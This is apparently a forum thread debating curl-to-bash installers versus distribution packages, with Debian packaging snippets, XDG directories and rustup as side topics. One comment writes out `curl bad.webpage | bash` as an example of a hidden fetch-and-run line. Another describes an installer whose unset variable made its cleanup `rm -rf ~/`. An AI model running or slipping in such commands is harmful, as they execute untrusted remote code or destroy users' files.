The Audacity of Piping Curl to Bash
This seems almost like a misunderstanding of what the role of an installer is, especially for something like Oh My Zsh. The author is complaining that it takes over their zsh configuration, when in fact that is obviously the whole point of the installer.
An installer isn't simply there to copy a program to your system. It's there to copy files to your system and then modify your system so that it is ready to use the new program to the deepest level that makes sense. You're not supposed to need to do any other configuration of your system for this program after the installer finishes in order to properly use it. This includes things like associating file types with this program, changing system settings to make it default in various places (hopefully with some kind of flag, to be fair), discovering and associating hardware or any other step like that.
Note that piping curl to bash or running bash on the output of curl/wget is a minor point quickly glossed over in the article, which is actually complaining much more about using custom installation scripts that do "too much".
The other part of an installer's job is to provide a reliable way to uninstall the program, without leaving any mess behind.
I think that's the main reason I'm reluctant to run curl|bash-ware. I might trust the authors not to be malicious, but I generally wouldn't trust them to be competent at cleaning up after themselves.
Yes, having a proper method for uninstalling is one big advantage of "proper" installers (like .deb packages or .msi installers on Windows) - though of course there is no guarantee even then that it will properly clean up the system.
However, having a package that simply installs some files and then tells you "copy these lines to your .bashrc and modify this mount file and [...]" to set up your system is really not that much better - if you follow those instructions, it will be up to you to manually un-follow them if you later decide to stop using this package. And while whoever wrote the installer may or may not properly undo what they installed in the uninstaller, I can guarantee that no one will provide an uninstaller which undoes changes you manually made.
> a reliable way to uninstall the program, without leaving any mess behind
cc: Anyone working on macOS
Uninstalling macOS apps is usually as simple as removing the app bundle.
If only that were true. Apps leave their config and support files all over the file system.
Also true of literally every OS, on the inherited wisdom that separating the config from the actual application allows it to persist through upgrades and reinstalls easily.
There are certainly other ways to do that, but this is how it has been done since forever.
Windows uninstall isn't guaranteed to be perfect but it's much better in this regard. It's common on Windows to have uninstaller apps that go around cleaning up the crumbs of the application. The equivalent on macOS isn't unheard of but it's rare.
I assure you that the vast majority of Windows software leaves config files and registry entries behind when uninstalled.
A proper uninstaller actually gives even this as an option though
>It's common on Windows to have uninstaller apps that go around cleaning up the crumbs of the application.
In my experience, what's common is the inverse of that. And leaving config files spread throughout the system is one thing. Sometimes the uninstaller doesn't even remove the Program Files directory, leaving it behind with cache, tmp files, etc. (Things that shouldn't even be there in the first place, but anyway.)
Right, but a few KBs of config is less of a bother than a few hundred megs of deps installed all over the place.
The config and data are an iffy situation, because you might be uninstalling just to install a new version, and so might want them to stay, might want them gone.
Precisely, if this is the suggested distribution method then I have to assume there's been even less investment in 'undistribution'
It's possible for installers to be this full-featured, but it's plagued with footguns.
They try, and often fail, to make an idempotent shellrc patcher with command line pipes, or something equally convoluted. If at all.
Instead of using something established, or even better... drop-in config directories.
Not everything needs to own (or even touch) the main config file!
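A minimal sketch of the drop-in idea, assuming zsh (the directory name here is made up):

  # one user-controlled line in ~/.zshrc, added once by the user:
  for f in ~/.zshrc.d/*.zsh(N); do source "$f"; done
  # an installer then only writes ~/.zshrc.d/my-tool.zsh,
  # and uninstalling is just deleting that one file.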
edit: Don't trust the 'curl the script before piping it' thing, either.
I don't have it handy, but there are demonstrated ways to alter the content based on timing, causing the piped script to be a malicious payload
It's almost an admission of guilt; nobody ever thinks about the uninstall.
Even worse if the app starts with sudo to install some stuff in system directories
>An installer [... is] there to copy files to your system and then modify your system so that it is ready to use the new program to the deepest level that makes sense
Sure, but what's the corresponding step in the zsh "install"? Looks like copying over their ~/.zshrc. The "install" script could have chosen to clone the git repo, copy the file, then print "all done! run 'zsh' to start your new shell!" or whatever
> If my package manager had an Oh My Zsh package
This is the author missing the point. The reason `curl | bash` is common is because devs don't like packaging for every distro under the sun, and MacOS, and FreeBSD, and... If you really think `curl | bash` is the problem, then you should be lining up to package the stuff you use for your distro. Instead, it is always someone else's problem.
Package managers are great... for the user. For everyone else, a polyglot system, with arcane technical policies, and even more arcane human policies is... not ideal.
The effort to package is precisely what the complaint is about; you have to declare (in the package manifest) where your files land and which are app files (to be removed freely) and which are config (the user might want to keep it, and it won't be automatically overwritten on update)
> devs don't like packaging for every distro under the sun
A source .deb will generally work fine under Ubuntu, Debian, and most flavours unless you have some funky dependencies (and if you do, the installer will also be complex).
A RHEL/CentOS RPM will cover nearly the whole rest of the market.
MacOS/FreeBSD will be different enough anyway that you will need to write a bunch more in an install script.
Building a simple package that just delivers a binary is not even that complicated. Getting it to pass distro muster is often harder, but you don't need to do that.
> Package managers are great... for the user. For everyone else, a polyglot system, with arcane technical policies, and even more arcane human policies is... not ideal.
Most of those "arcane" policies are there so a random incompetent dev won't fuck up other stuff in the system. Which is also why users want packages in the first place.
And you don't need to abide by any policy to make a simple package that just puts your files on the system. Building a dumb Debian package is just a few metadata files (post/preinst scripts + a file describing your package) in a directory and a single command.
You only need to worry about policies if you want to submit a package to a distro, and those are in place for a reason.
No shit they are better for users, that's their entire fucking point!
> No shit they are better for users, that's their entire fucking point!
I'm not even sure we disagree about anything, and you're yelling? FWIW I package and distribute my software but for a long time I didn't.
My position is very simple -- it's always easier if someone else does the work for you. If someone chooses not to distribute with a package, that's fine. If it bothers you, the choice is to build a package spec and pipeline for that project, not to moan about it. But packages are not an entitlement of a non-paying user. That user is perfectly entitled not to use your software, but complaining about the packages you may or may not have available is stupid, and not the dev's problem.
With things like the OpenSUSE build system... I see this more as a one time cost
You write the spec files for the managers of choice; DEB, RPM, PKGBUILD, whatever
With that you parameterize the inputs. The version to build, where to get the sources, etc.
Maintaining these is... noting your build/runtime requirements the same way you do while developing.
Once the specs are written the laborious work is finished. There are countless tools to make this less effort, eg: pyp2rpm and alien
I maintain packages through Fedora COPR, a similar system. These tools are my first pass at writing the spec for things I don't even own.
I practice what I'm preaching, and I really don't buy that it's a lot of effort. If you want users, do it.
This is a critical first step to being bundled in the distribution itself. You won't get maintainers if there's nothing to maintain.
Pretty much. I've built a few for the internal stuff and it is essentially a one-time effort for DEB-based platforms.
Clowns at Red Hat do like to break manifest compatibility in the worst way though, think "a macro with the same name in a new version now does something else". The idea of the .spec file being the whole manifest is... nice in theory, not in Red Hat's execution. But then the last time I did any for RHEL was around the RHEL 6/7 era, maybe it's better now...
But even in that case, that's fixing a few minor things every 3-5 years at worst. There is no excuse not to make your packages if you're an actual serious developer, not some random hobbyist.
I do give a pass to apps that run as a single binary, as that, while suboptimal, is at least easy to work around.
Oh you're right, that surprise macro dance is an absolute pain.
Being on Fedora I run into this a little more regularly than you would on proper RH these days, it's like the prerelease playground.
If you (or anyone) had things building fine for Fedora 36, they may not on 37. I forget which, but one of the macros I repeatedly use moved packages
One of these likely translates to a future Red Hat release
> I practice what I'm preaching, and I really don't buy that it's a lot of effort. If you want users, do it.
I've heard a lot about these systems, and, if they do what they promise, I think this is great. Exactly what is needed. I already package and distribute my software. My comments are mostly directed at those who have a problem with those who don't, because that's a fine choice too. It can also be a fine choice for a while. The problem is mostly one of attitude; we need less user entitlement re: packages. Packages are something I will get to if I want to, when I have the time, and if it interests me.
I would note there are other problems with the package manager ecosystem which make it ill-suited to packaging Rust apps, for instance. I am not an Arch user, but Arch really is leading the way here: https://wiki.archlinux.org/title/Rust_package_guidelines
Thank you for the packages you do maintain!
I don't want to seem unappreciative for the work developers like yourself and others do; packages or not.
I'm not a developer, but a Linux/systems person who happened to learn packaging. Mostly because I got tired of building from source, and figured others were too.
As a maintainer it is easy for me (and others) to trivialize this, as compared to actually writing the much more complicated software. It's not right, and I think we could all use more understanding.
I see a meme that 'packaging is hard', and while very rigid/plain, it's not actually that tough.
Priority is another matter, I just don't want this notion of difficulty to unfairly sway that priority. Many of the concepts reapply, like languages. The tooling/services have improved a lot
I'm not too familiar with Rust, unfortunately. What would you say makes Arch stand out in particular?
How do you feel about Fedora? https://docs.fedoraproject.org/en-US/packaging-guidelines/Ru...
It's even worse than that. The way common distros work is not "devs package software", it's "devs convince distro to pick up the package and maintain a fork".
Of course, you can run your own APT or RPM repo, but that actually asks your users for even more control of their systems (since you now have a way to get any new version more or less automatically installed on their system in perpetuity), and it makes it even harder for them to install your software.
You can also bundle your software as a .deb + .rpm + .[...] file instead of a .sh file, but there is really not that much difference.
> It's even worse than that. The way common distros work is not "devs package software", it's "devs convince distro to pick up the package and maintain a fork".
> Of course, you can run your own APT or RPM repo, but that actually asks your users for even more control of their systems (since you now have a way to get any new version more or less automatically installed on their system in perpetuity), and it makes it even harder for them to install your software.
Technically incorrect, as you can put (at least in apt) filters on what's allowed from a repo.
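For example, something like this in an apt preferences file (a sketch; the origin hostname and package name are made up):

  Explanation: allow exactly one package from the vendor repo
  Package: some-tool
  Pin: origin "pkgs.vendor.example"
  Pin-Priority: 500

  Explanation: refuse everything else that repo ships
  Package: *
  Pin: origin "pkgs.vendor.example"
  Pin-Priority: -1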
Also, you want to have your cake and eat it too.
Either there is some 3rd party to look at package quality (even if "quality" in this case is "does not fuck up other stuff" and "uninstalls properly"),
or you trust the developer not to fuck you over when they update the package,
or you don't, and only install the raw .deb file.
> You can also bundle your software as a .deb + .rpm + .[...] file instead of a .sh file, but there is really not that much difference.
The main difference is that a package can require system deps (so you will be sure that they are not removed by accident) and you don't need to write an uninstaller for it.
> but that actually asks your users for even more control of their systems
Or you can support one of the limited-capability package ecosystems, like Flatpak or Snap or AppImage. Then it's sort of like installing an app on your Android phone: the installed app (and its updates) only get to interact with the system through a customized sandbox that must first be described to, and accepted by, the user.
Sure, but there is plenty of software for which that doesn't make any sense, since the whole point is to interact with your system. ohmyzsh is a good example, as are most SDKs, as is plenty of specialty software.
SDKs are an interesting case — it wouldn't work to package them into a sandbox by default, but do look at how macOS treats Xcode for an example of how something can be "sandboxed" yet still reach out into the system, by having the system reach into it instead. A thin layer of non-sandboxed system components on macOS "expects" Xcode, and so works with it if it's available, extracting specific sandboxed data from the Xcode sandbox and thereby "publishing" it into being standalone software (rather than software that ends up also running inside the Xcode sandbox.)
Essentially, an SDK in this sense would be a sandboxed plugin for a non-sandboxed system-level meta-SDK manager, that knows how to use these SDKs (in their sandboxes!) to compile and/or test-run things; where a test-run gets granted capabilities that the SDK-as-compiler does not itself possess, per a capabilities manifest fed in with the meta-SDK development project.
AppImage is not "limited-capability" and has no sandbox mechanism at all without additional tools. An AppImage is the rough equivalent of a statically compiled binary.
> devs don't like packaging for every distro under the sun, and MacOS, and FreeBSD, and... If you really think `curl | bash` is the problem, then you should be lining up to package the stuff you use for your distro
I mean, no, those aren't the only two solutions. As with accessibility requirements for public-access shops, "we the users" could mandate (either through legislation, or more interestingly, through some kind of medical/legal-like software-engineering bar association) that devs either properly package their apps, or don't release them at all.
I'm not saying it's a good idea; just saying that it's probably the solution brewing in the back of the minds of people who write things like this.
> devs either properly package their apps, or don't release them at all.
There's still no widely accepted answer for what 'properly package their apps' looks like. You could want snaps or appimages or a flatpak, or rpms or debs or docker containers or nix flakes or cargo crates or python virtual environments or jars or javawebstarts or portable windows executables or windows msis or webasm packages or web pages ... there's an impossible profusion that it's currently unreasonable to expect devs (many of whom are working for free) to support more than a couple of.
If there were a single solution that worked in almost all cases and platforms, didn't put unreasonable constraints on packagers and was widely adopted, then it might be somewhat reasonable to expect devs to support it, but that's far from the world we live in. The closest to that (despite its real problems) is probably piping a curl to a bash script...
>There's still no widely accepted answer for what 'properly package their apps' looks like. You could want snaps or appimages or a flatpak, or rpms or debs or docker containers or nix flakes or cargo crates or python virtual environments or jars or javawebstarts or portable windows executables or windows msis or webasm packages or web pages ...
Any single one of them is better than curl|sh. Just pick one. Even shipping a raw runnable binary blob is preferable.
But to classify: as long as it is a unit managed by a system that can be wholly removed (sans data/configs, as you might want to keep those), it works well enough as a "package".
> there's an impossible profusion that it's currently unreasonable to expect devs (many of whom are working for free) to support more than a couple of.
...I don't think I've ever seen anyone ask to support more than one per platform. Obviously users on MacOS (assuming the app even releases there) will complain if you only have .deb packages, but you won't get many "oh, only .deb? I wanted a Flatpak!"
> I don't think I ever saw anyone asking to support more than one for a platform
What do you mean by platform? If you only ship a .deb, there are going to be a lot of linux and unix users who simply can't use your stuff.
I've seen quite a few tools use curl to bash to work in macOS, windows and multiple flavours of unix. There aren't a huge number of other approaches that can allow that.
I mean, that will just result in no software ever getting made outside of big companies who can afford entire departments of people specializing in packaging.
If someone were to impose restrictions to the hobby things I do, then those hobby things will just become private repositories that will never see the light of day, and I'm sure that rings true for most people.
> "we the users" could mandate
Yuck. As I said:
> Instead, it is always someone else's problem.
"I am the customer mentality" has been with FOSS and Linux for awhile, but one wishes people might shake themselves out of their stupor for 2 seconds to realize: "You're getting all this stuff for free." Instead, every user wants to man the battlements on Reddit and tell devs how to do the thing.
Re: the parent, she/he shouldn't be downvoted for making an unpopular yet interesting point.
> "You're getting all this stuff for free."
Of course.
Part of packaging something, and then releasing it through a distro's package manager, is that it goes through the distro's release process; someone reviews it. It becomes part of the distro. In particular, if it goes into something like Debian's "main" repository, I'm inclined to trust it almost as much as I trust the core OS release.
I'm not going to man battlements anywhere over this kind of thing; but I'm not going to execute arbitrary shell scripts downloaded from the internet without reviewing them; and 600 lines of shell-script is more than I want to review, unless I'm super-motivated. If the only way of installing a package is Docker (which I don't care for) or wildcat script, and that package has no maintainer for my chosen distro; that's fine, and I'm not going to beat up the developer. It's not his fault, nor his responsibility.
So instead I generally look for an alternative package that's shipped by my distro. I don't keep a record of all the wildcat software installed on my systems, because there usually isn't any, and my package manager knows exactly what's installed.
> I'm not going to man battlements anywhere over this kind of thing
Totally agree. A preference is fine. A demand that devs do something different with their limited time and resources is nonsense. Making the choice not to package and distribute is fine. Then -- it just becomes someone else's problem. You hate omz's update method? Then be prepared to package it yourself. That's all I'm saying.
Yet somehow as a developer I have no problem at all realising that it is user-hostile to take liberties with their system.
It's violating trust and I have no need to do it in order to provide, even to install, a piece of software.
> It's violating trust
`curl | bash` is pretty upfront about what it is. It would seem the user is the one taking liberties, but perhaps I'm missing your point?
Even if omz had a package-managed package, it would do the basic curl|bash itself the moment it was installed, to update itself. Technically it's git and things, but that's all the curl|bash does anyway.
> I would have just expected it to install it in the proper location (hopefully not in my home directory) and leave the rest of the configuration to me
While I don't advocate for piping curl to bash, this is exactly what I expect an installer to do. It should provide sane defaults that don't require me to fiddle around with manpages or other documentation and config files before I can even use the thing. I'd say that's even the standard for most software. Now, I might compromise on the installer telling me what command I need to enter to get a default configuration/setup integrated instead of doing it automatically, but I have too much shit to do to waste it on configuring the nth thing I've installed this week.
I think what's missing is some standardization around what an installer is allowed to do and flags to tell it when to make certain changes as well as explicit logging for what exactly was changed or added where, but that's not going to be solved if everybody has their own bespoke bash script for installation.
> I think what's missing is some standardization around what an installer is allowed to do
I don't mean to be facetious, genuinely curious, but to the author's point, isn't that the point of the package management system? It's a standardized and encapsulated way to provide software, with sane defaults, in an auditable way, that respects the user's system.
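For instance, the "auditable" part is already answerable with stock dpkg/apt commands (package name hypothetical):

  dpkg -L some-tool           # list every file the package installed, and where
  dpkg -S /usr/bin/some-tool  # ask which package owns a given file
  apt-get purge some-tool     # remove it again, config files included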
I tend to agree with the author here, but I'm sympathetic to the maintainer: packaging for rpm/deb (in my experience) can sometimes be an enormous pain with many hoops to jump through, _especially_ if you're trying to get your package accepted upstream. With that said, it is a mature, standardized process, and is fairly painless in the self-hosted/non-upstreamed case.
> packaging for rpm/deb (in my experience) can sometimes be an enormous pain with many hoops to jump through, _especially_ if you're trying to get your package accepted upstream
I would say this is the primary pain point for maintainers, which is why we're suddenly seeing bash scripts instead. The technical complexity and the process of upstreaming and then doing this for a bunch of different distros. If they're already rejecting package management systems because of their current state, the solution isn't "well, why don't they just use existing package management systems".
> the solution isn't "well, why don't they just use existing package management systems"
Fair enough, I think I was more trying to unwrap the idea of "shell script standardization", which to me feels like a package management system.
To your point about the challenges of packaging for multiple distros, there are force multiplying tools I've used in the past that make this easier, but in my experience it is always a big challenge.
My hope is that things like Nix or even something like brew can help to further consolidate the installation process for software going forward, so that everyone can have the best of all worlds :D
> Fair enough, I think I was more trying to unwrap the idea of "shell script standardization", which to me feels like a package management system.
And you're right, of course. I just think it's important to recognize what is being compensated for when existing solutions are rejected. We have a habit of saying "they shouldn't be doing that, we have this already" instead of "this is a signal that something in the environment is making what they're doing a viable alternative, how can we improve things?"
I don't think it's an accident that we're seeing the rise of Snap and flatpak or even Nix at the same time.
> I don't think it's an accident that we're seeing the rise of Snap and flatpak or even Nix at the same time.
It's not because making packages is hard, it's because making sure you bring your app dependencies with you is.
It is generally a problem for languages that are not self-contained (the way Go or Java are) but need a bunch of .so libs to run.
The distro's attitude is pretty much "we want X version of a lib, we will support that version and focus all patches on this version for this release". It works, it keeps things stable (you know exactly what you need to target with your app), and a security update of a library hits every app using that library, but it is a PITA if
* your app needs something newer for features
* lib your app uses is not in distro already, then you need to either embed it with main package or package that too.
* your developers can't even figure out which version is enough, so they just pull whatever is on their desktop as the "production" dependency.
All the effort there is in making sure devs who can't figure that out at least use the same base (docker's FROM being one example) and that they don't have to package all the other stuff the app needs as separate packages (docker/flatpak/appimage).
"Fat" packages like that obviously have some benefits, but, well, in a distro I can upgrade OpenSSL and now every app is safe; in a flatpak/appimage/docker-ridden environment, every single one of those fat packages needs its maintainer to care enough to upgrade. So while easier on dev effort, they are a security disaster waiting to happen.
The person you cited is either lying by omission or doesn't have a clue.
Getting a package up to distro standards and having it included in the distro can be complex.
Making a package? Nope. Make a dir tree:

  ./DEBIAN/control
  ./usr/bin/yourapp

make a control file:

  Package: my-tools
  Version: 0.0.1
  Section: base
  Priority: optional
  Architecture: all
  Maintainer: Someone <some@email>
  Depends: etckeeper (>= 0.40), git-core, iotop, iftop, links, mc, multitail, mtr-tiny, nmap, psmisc, screen, tcpdump, curl, socat
  Recommends: swaks, atop, ntpdate
  Suggests: hping3
  Conflicts: vim
  Description: Some random tools i use for everyday work

run one command:

  fakeroot dpkg-deb -b my-tools

and you sir are fucking DONE. Want a postinst script? Shove it in ./DEBIAN/postinst
Want to tell the package manager "those are configs, don't replace them on upgrade"? Put a list of them in ./DEBIAN/conffiles
In the case of RPM, all of that info is even in a single file (although a bit more fuckery, IIRC), but if you are lazy you can just make a deb package and convert it to RPM.
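(e.g., sticking with the alien tool mentioned upthread and the package built above:)

  alien --to-rpm my-tools.deb   # emits an .rpm converted from the .deb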
Making a simple package is EXTREMELY simple. The checks run by a distro are not, but they need to make sure your package doesn't leave crap or break anything else, so IMO that's understandable; you can just host somewhere else if you don't agree with distro policies.
I don't think I implied making a package wasn't simple...from my comment:
> With that said, it is a mature, standardized process, and is fairly painless in the self-hosted/non-upstreamed case
There is no way a monolithic bash script full of if statements and list of dependencies for every single possible linux or bsd distribution is more maintainable than having a clean set of RPM spec, APT control, AUR PKGBUILD and BSD packages makefiles.
Devs who use curl | bash do that because they are control freaks and want and love to make a mess in users' homedirs, that is all. This is an ego issue, not a technical one.
>I think what's missing is some standardization around what an installer is allowed to do and flags to tell it when to make certain changes as well as explicit logging for what exactly was changed or added where, but that's not going to be solved if everybody has their own bespoke bash script for installation.
YOU ARE RIGHT!
What's more, we could make common installer code so everyone could just use the same rules and documentation to customize it to their liking.
And once we have many apps using it, it might even be integrated into the system so you don't have to download as much, and all the bugfixes are in one place so we don't have a thousand different install scripts.
Once we have that, we can just make a very simple data file format, say just a data.tar.gz for the data and a control.tar.gz for telling the installer what to do. As for metadata, just write a simple file, say

  Package: my-tools
  Version: 0.0.1
  Section: base
  Priority: optional
  Architecture: all
  Maintainer: Someuser <some@email>

If you need to run something after the installer, just put it in control.tar.gz as a postinst script and it will do that. And if it's all one format, we can make it manage uninstalls too! Just keep a simple text database of those files.
OH WAIT THAT'S A FUCKING DEBIAN PACKAGE MANAGER
You could've at least looked at the replies to my comment before ranting pointlessly.
curl ... | bash
is the moral equivalent of {npm, pip, nuget, ...} install
and I really don't understand the folderol around that. In both cases, you can alter the command slightly to instead download the payload without executing it and inspect it first, if you wish. In both cases, you're ultimately going to either audit and then execute, or just execute, code from Somewhere Else.

This is true for distro package managers too, though you could argue that sometimes but not always (PPAs, community/, whatever) a distro package manager is an extra layer of insulation between you and nasty stuff.
This is kind of my take on it. As gross as I find pipe-to-shell installers to be instinctually, I can't really think of any objections I have about them which don't apply to just grabbing a package from MacPorts, save for one: MacPorts gives me a unified interface for listing and uninstalling that software after it's installed that I don't get from ad hoc installers. But in terms of the common complaints like security, it's pretty much the same - it's not like I'm auditing the source or patches of all the software I'm installing via MacPorts either.
If curl dies early, bash might be executing a truncated script. Arbitrarily truncated bash scripts are often valid bash scripts that do things you don't want.
You can trivially sidestep this with a main shell function called at the end of your script. https://github.com/terrastruct/d2/blob/729b12685af79bbdaf4b3...
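The pattern being described is roughly this (a minimal sketch):

  #!/bin/sh
  # nothing executes until the last line, so a download that dies partway
  # leaves the call to main missing (or the function half-defined, which is
  # a syntax error) -- either way no half-finished install steps run
  main() {
    set -eu
    echo "installing..."
    # ...actual install steps would go here...
  }

  main "$@"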
Kinda! The author of the script can trivially avoid the problem. The person pasting "curl ... | bash" into their terminal needs to rely on them having done so, which (last I looked) they too often haven't.
Another downside of these scripts is that they tend to make changes to your user or machine configuration, something which is tolerated from Windows installers but a big no-no for me. E.g. I believe Cargo edits .profile to add its path and Teams makes itself start at login (!).
For reasons such as these, but also things like telemetry configuration defaults and clean uninstalling, I prefer using a package manager. In a way independent package maintainers balance out the power of upstream developers over end users. They embody “you can just change it if you don’t like it” for the regular user.
Cargo does not. Rustup’s installer does, by default. It informs you of this before it does so, and you can ask it to not if you’d prefer.
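(If memory serves, the opt-out looks roughly like this:)

  curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh -s -- --no-modify-path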
Thanks for clarifying - it’s been a while!
Any time :) In the end your main post is right, just the details are a bit different.
Agree with author. For me, in addition to separating the "download script" and "run it" steps, there is also a "read script to figure out just what the heck it is going to do to my system", with optional "edit script to remove silly things" and "just manually run the three important commands" steps.
Unfortunately, there just isn't a way to square the circle of "this has to work for everybody" and "this shouldn't take 300 lines to ensure a directory exists".
I post this every time this topic comes up.
Piping from the internet into your shell is a bad idea.
https://www.idontplaydarts.com/2016/04/detecting-curl-pipe-b...
I used to think that.
But is it really that much worse than `pip install` random stuff? Or Homebrew, or Linux package managers - it's not like these things get audited.
> it's not like these things get audited.
APT is part of the core Debian distro. I don't know about "audited", but it's tested, and it's maintained. And the packages in "main" are also tested.
I don't program in Python, and I don't know how Pip packages are audited. An awful lot of the packages in Debian main are Python and Ruby libraries, and I suspect that they are rarely used: I assume most Python and Ruby users rely on their own language-specific package manager.
I also regret the arrival of distro-agnostic package managers like Flatpak. But that's fine; I understand why developers use them, and I'm not going to rag on them for that decision. I'm just much less likely to install them.
My point is: how hard would it be for a malicious actor to slip something bad into a "high quality" resource such as APT (or any other method safer than curl|bash)? I suspect not that hard.
For Python there has certainly been typo-squatting with malicious packages. Notoriously, something like this happened for node (IIRC, not a JS dev). I can well imagine the general code hygiene for Debian is higher, but unless someone really checks and reads the pyramid of requirements, I think safety is maybe only illusorily higher than curl|bash. At the end of the day, I have to trust that whoever is providing the code isn't trying to hack me.
For example, to just install Jupyter Notebook (standard Python thing) installs 72 dependencies (I just checked). Do Debian devs check each and every one of them? From memory, Jupyter is available as an APT package.
Or if someone shares an interesting project on HN and points to a GitHub repo, do I read through every line of code? I'll probably skim through any code before running it. But shelling out to a malicious command (like `curl bad.webpage | bash`:) ) is literally one line and easy to hide.
So yes, if I have some malware that requires literally hundreds of lines of dodgy-looking code, it's easier to slip into a curl|bash. But one little line of evil? Not sure it's easier.
> Do Debian devs check each and every one of them?
Well, if Jupyter Notebook is in main, then the libraries it depends on also have to be in main. That means they have Debian maintainers, and have to go through Debian release management. So yes: in theory, the entire stack is checked.
Not by Debian "devs" - I think those are the guys that work on Debian native software, like the installer and dpkg. The checking is done by Debian maintainers and the release managers. And the users, of course; I'm ever grateful to the users who install Sid, and report back to the maintainers.
Most software which doesn't just curl|bash tells you to add their custom repo to APT/YUM/APK/whatever. Very few packages actually rely on the Debian maintainers to add them to the core package repos as a way of being distributed, and even fewer want to use Debian's glacial pace of releasing updates.
Well, I avoid custom repos; I used to have a couple installed on one system a few years ago, but evidently I'm not using "most software".
You're right about Debian, that it moves at a glacial pace. For some of us, that's a benefit. Debian (main) is noted for its stability, and people running services that already work fine, prize stability over new features.
FWIW I switched to Devuan on most machines. I think Debian was over-hasty in jumping on the bandwagon. But Devuan rides on Debian's coattails; I still rely completely on Debian's policies and release processes. I consider myself a Debian user.
Yes it is really that much worse. Homebrew in particular has always been a terrible example itself. Yes a linux package manager is entirely different.
It's not any worse. The exceptions are the official repos for some of the major distros that have lots of active maintainers and eyeballs looking at and testing this stuff.
You didn't read the article, I'm 99% sure.
I read all of it. Should have bet on your odds.
That is kind of nonsense. If someone already has hacked or MITM'd the server offering the install script payload the game is already up. No attacker is going to bother doing that, since the number of people who read the install script before sending it off to bash is minimal.
And every time you post it, a bunch of people point out that there is nothing going on here which package managers or installation executables can't also do.
> For the love of god, why do I still have programs on Linux that don’t use xdg directories?
Because a lot of devs have never heard of it? I'm a Linux app dev of <10 years and I'd never heard of XDG until this post. I just assumed dotfiles in the home directory were still the de facto standard...
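For anyone else hearing about it for the first time: the spec boils down to a handful of environment variables with fixed fallbacks ("myapp" is a placeholder):

  # config:  ${XDG_CONFIG_HOME:-$HOME/.config}/myapp/
  # data:    ${XDG_DATA_HOME:-$HOME/.local/share}/myapp/
  # cache:   ${XDG_CACHE_HOME:-$HOME/.cache}/myapp/
  conf_dir="${XDG_CONFIG_HOME:-$HOME/.config}/myapp"
  mkdir -p "$conf_dir"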
They are. XDG is one of those grand ideas that a few developers really wished everyone else did... but it isn't actually that important so most of the world doesn't bother or never even hears about it.
Not just applications. Entire programming languages like Rust depend on this to install the compiler (rustup, since rustc changes too fast for anything but the most rolling of distros to keep up).
> Entire programming languages like Rust depend on this to install the compiler
And it works! For people who have to stay on top of language changes (not everyone), who are on a wonky platform or that doesn't update quickly enough, this is actually a pretty okay method. And they do also offer alternative methods: https://rust-lang.github.io/rustup/installation/other.html
Here, the "You know what they should be doing..." attitude surely doesn't account for something.
> rustc changes too fast for anything but the most rolling of distros to keep up
This may have once been true, but isn't really anymore. Ubuntu updates rustc across its releases with the latest and greatest, and does so about every couple of minor version releases (last was 1.59 to 1.61). This is fine for me. My MSRV is now whatever Ubuntu is shipping.
>For people who have to stay on top of language changes (not everyone)
Or anyone that wants to try out the latest "$something but in rust" and tries to compile it.
>who are on a wonky platform or that doesn't update quickly enough,
i.e., the vast majority of people, so I question the word "wonky" here.
>This may have once been true, but isn't really anymore.
It's still true in my experience. But then again, Rust does change really fast. Maybe they fixed their entire bleeding edge demographic in the last couple weeks and now people refrain from using $latest features that don't work in rustc from 3 months ago.
> Or anyone that wants to try out the latest "$something but in rust" and tries to compile it.
This is kinda true. I think it's a smallish demographic re: who usually downloads a compiler, but it happens. I had a very sophisticated user/dev file a bug about how my software wouldn't compile. Turns out, re: compiling from source, they downloaded an old version of rustc from their distro's repos instead of following my instructions, and my new sources wouldn't compile.
Now this was user error. But it happens. Just re: this compiler error, it was a good change and an easy fix. I stick to an MSRV now.
> ie, the vast majority of people so I question the word "wonky" here.
The vast majority of people aren't downloading compilers.
> Maybe they fixed their entire bleeding edge demographic in the last couple weeks and now people refrain from using $latest features that don't work in rustc from 3 months ago.
Price of using a non-dead language I'm afraid? You and I don't have to worry about the current patois of Latin or ancient Greek either? Remember -- the problem is I create something new, which compiles with a newer version of the compiler, you download the sources and compile, and you get an error because you have an older version of the compiler. This happens in every ecosystem, whether its C, Python or Rust.
If your argument to me/the kids is: it should be old and nothing should ever change, I'm not sure that's a winner.
> It should be old and nothing should ever change
Bash gets new features, forward-incompatible features, fairly regularly still. It changes almost as much as Rust. But guess what? Bash devs don't expect that it's only other Bash devs using the latest bleeding-edge version from last month. They, in general, write code that will work anywhere, any time.
Rust code could be written in this way. But it isn't, because of the type of demographic that currently writes in Rust. I have confidence this will change over the next decade. But right now, fast forward-incompatible changes combined with fast forward-incompatible devs make for a very limited lifespan of any rustc. And that leads to the vast majority of the documentation suggesting curl | sh. You don't get that with other languages.
I'm not arguing for no change ever. That's silly. I'm arguing for not writing for the bleeding edge just because you can.
It's one way out of several to install rust. And interestingly enough, my distro maintains a more up to date rust than I do myself.
My issue with piping curl to bash is that so many of these installers are pure junk.
Case in point: I work in web hosting. Yesterday a customer came to me asking for root access to the node so they could run an installer for something. No. But they had already tried running it as their user. And everything in their user account was gone. Why?
Because the installer expected to run as root, and its variables couldn't be defined properly and so when it went to clean up after itself, it did
rm -rf ~/$variable/
and since the variable was unassigned, that became rm -rf ~/
I might not have it exactly right, but that's what the effect was. Piping curl to bash is asking a lot of somebody who doesn't know what they're doing, and should raise the hackles of somebody who does. At the very least, download and view the script yourself before running it.
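(For what it's worth, the usual guard against that exact failure is making the expansion fatal when the variable is empty — install_dir is a stand-in name:)

  set -u                                 # treat unset variables as errors, not as ""
  rm -rf ~/"${install_dir:?not set}"/    # ${var:?} aborts the script instead of expanding to nothing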
> why do I still have programs on Linux that don't use xdg directories?
Because there are Linux developers who have never heard of XDG and just put their stuff wherever. And since ignoring XDG doesn't make your application completely unusable, they have pretty much zero incentive to learn about it. Crazy world, isn't it?
XDG is a specification of Free Desktop, a body that I don't trust. Standardizing filesystem locations can't be a bad thing; but an awful lot of it is tied into the requirements of GNOME Desktop, a project which seems to be trying to rule the world, and which I don't want to help with.
Perhaps if XDG were cut loose from the Free Desktop project, more developers and maintainers would pay more attention to it.
That's one reason. Another reason is that while some effort was spent on writing this spec, apparently (?) almost no effort was spent on promoting/enforcing it: there is another top-level comment in this thread from a 10-year Linux application developer that says they've learned about XDG from this very post.
And indeed, there are lots of tremendously popular apps out there (Slack, for instance) that use e.g. $HOME/Downloads as a default download directory instead of $(xdg-user-dir DOWNLOAD), and most users don't mind.
Because '$HOME/Downloads' is the default for `xdg-user-dir DOWNLOAD` and most users never change it.
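(For concreteness — the lookup and the file behind it; /home/alice is a made-up user:)

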